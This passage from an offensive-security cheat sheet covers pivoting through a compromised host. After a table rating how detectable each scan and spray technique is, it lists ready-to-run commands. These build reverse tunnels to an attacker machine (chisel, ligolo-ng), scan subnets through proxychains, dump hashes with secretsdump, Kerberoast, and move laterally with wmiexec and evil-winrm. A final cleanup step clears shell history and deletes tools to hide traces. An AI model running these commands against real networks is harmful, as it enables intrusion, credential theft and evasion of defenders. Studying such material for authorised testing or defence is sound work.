| Full port scan | 🔴 HIGH | 65K connections per target | Mass connection alerts | Obvious scan from pivot |
| Subnet sweep | 🔴 HIGH | 254× connections | Every host logs connection | Pivot scanning entire subnet |
| netexec spray | 🟠 MED-HIGH | Multiple SMB connections | Auth logs (4624/4625) | Credential testing pattern |
| Impacket lateral | 🟡 MEDIUM | Tool-specific connections | Event 4624, service creation | Unusual auth from pivot |
8. Quick Reference — Authenticated Pivot
# ===== TUNNEL SETUP =====
# SSH SOCKS
ssh -D 1080 -N -f user@PIVOT_IP
# Chisel reverse SOCKS
chisel server -p 8080 --reverse # Your box
./chisel client YOUR_IP:8080 R:socks # Pivot
# Ligolo-ng (no proxychains needed!)
./proxy -selfcert -laddr 0.0.0.0:443 # Your box
./agent -connect YOUR_IP:443 -ignore-cert # Pivot
# sshuttle (no proxychains needed!)
sshuttle -r user@PIVOT_IP 10.10.10.0/24
# ===== PROXYCHAINS CONFIG =====
cat > /etc/proxychains4.conf << 'EOF'
strict_chain
quiet_mode
proxy_dns
tcp_read_time_out 8000
tcp_connect_time_out 5000
[ProxyList]
socks5 127.0.0.1 1080
EOF
# ===== SCANNING =====
proxychains -q nmap -sT -Pn -n -p 445 --open SUBNET/24 # Find Windows
proxychains -q nmap -sT -Pn -n -p 88,389 --open SUBNET/24 # Find DCs
proxychains -q nmap -sT -Pn -n --top-ports 20 --open TARGET # Service enum
# ===== ENUMERATION =====
proxychains -q netexec smb SUBNET/24 # SMB enum
proxychains -q netexec smb TARGET -u USER -p PASS --shares # Shares
proxychains -q GetUserSPNs.py domain/user:pass -dc-ip DC # Kerberoast
proxychains -q secretsdump.py domain/user:pass@TARGET # Dump hashes
# ===== LATERAL MOVEMENT =====
proxychains -q wmiexec.py domain/user:pass@TARGET # WMI (quiet)
proxychains -q evil-winrm -i TARGET -u USER -p PASS # WinRM
proxychains -q xfreerdp /u:USER /p:PASS /v:TARGET # RDP
# ===== CLEANUP =====
kill $(pgrep -f "ssh.*-D.*1080")
ssh user@PIVOT "history -c; rm -f /tmp/chisel"